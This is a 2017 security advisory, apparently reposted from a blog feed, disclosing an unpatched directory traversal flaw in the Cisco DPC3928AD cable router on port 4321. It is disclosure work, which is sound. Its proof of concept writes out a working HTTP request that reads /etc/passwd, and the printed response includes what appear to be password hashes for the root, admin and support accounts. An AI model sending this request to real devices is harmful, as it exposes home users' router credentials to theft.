SSD Advisory – Cisco DPC3928AD DOCSIS Wireless Router Information Disclosure

May 31, 2017 admin Directory Traversal, File Disclosure, SecuriTeam Secure Disclosure

Credit to Author: SSD / Maor Schwartz| Date: Wed, 31 May 2017 07:33:40 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom

Vulnerability Summary
The following advisory describe information disclosure vulnerability in Cisco DPC3928AD DOCSIS wireless router. The Cisco DPC3928AD DOCSIS is a home wireless router that is currently “Out of support” but is provided by ISPs on a large scale in many countries.

Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vulnerability details
The information disclosure vulnerability allows an attacker to gin the passwd file from the router, the vulnerable port is 4321.

The banner of the remote service is:

 SERVER: Linux/#2 Wed Nov 12 10:23:46 CST 2014 UPnP/1.0 Broadcom UPNP/0.9

Proof of Concept

An attacker sending the following request:

 GET /../../../../../../../../../../../../../../../../etc/passwd  HTTP/1.1  Host: 192.168.0.10:4321  Accept: */*  Accept-Language: en  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)  Connection: close

GET /../../../../../../../../../../../../../../../../etc/passwd

HTTP/1.1

Host: 192.168.0.10:4321

Accept: */*

Accept–Language: en

User–Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Will receive from the server the following response:

 HTTP/1.1 200 OK  Content-Type: text/html  SERVER: Linux/#2 Wed Nov 12 10:23:46 CST 2014 UPnP/1.0 Broadcom UPNP/0.9  Content-Length: 247  Accept-Ranges: bytes  Date: Thu, 10 Nov 2016 16:01:04 GMS    root:HAdbdMWcXHCnkQ:0:0:root:/:/bim/sh  admin:aMzy8JIMAK89M:0:0:Administrator:/:bin/false  support:JJ05zzFhW9gaY:0:0:Technical Support:/:/bim/false  …

HTTP/1.1 200 OK

Content–Type: text/html

SERVER: Linux/#2 Wed Nov 12 10:23:46 CST 2014 UPnP/1.0 Broadcom UPNP/0.9

Content–Length: 247

Accept–Ranges: bytes

Date: Thu, 10 Nov 2016 16:01:04 GMS

root:HAdbdMWcXHCnkQ:0:0:root:/:/bim/sh

admin:aMzy8JIMAK89M:0:0:Administrator:/:bin/false

support:JJ05zzFhW9gaY:0:0:Technical Support:/:/bim/false

...

Vendor Response
The vendor has responded with the following:
“I wanted to follow-up with you regarding your Cisco DPC3928AD DOCSIS disclosure. After an extensive search for the product to perform validation, we were unable to source the gateway to validate your proof of concept. Due to the end-of-sale and end-of-life of the product Technicolor will not be patching the bug. If you have any further questions or concerns please feel free to contact me, thank you.”

https://blogs.securiteam.com/index.php/feed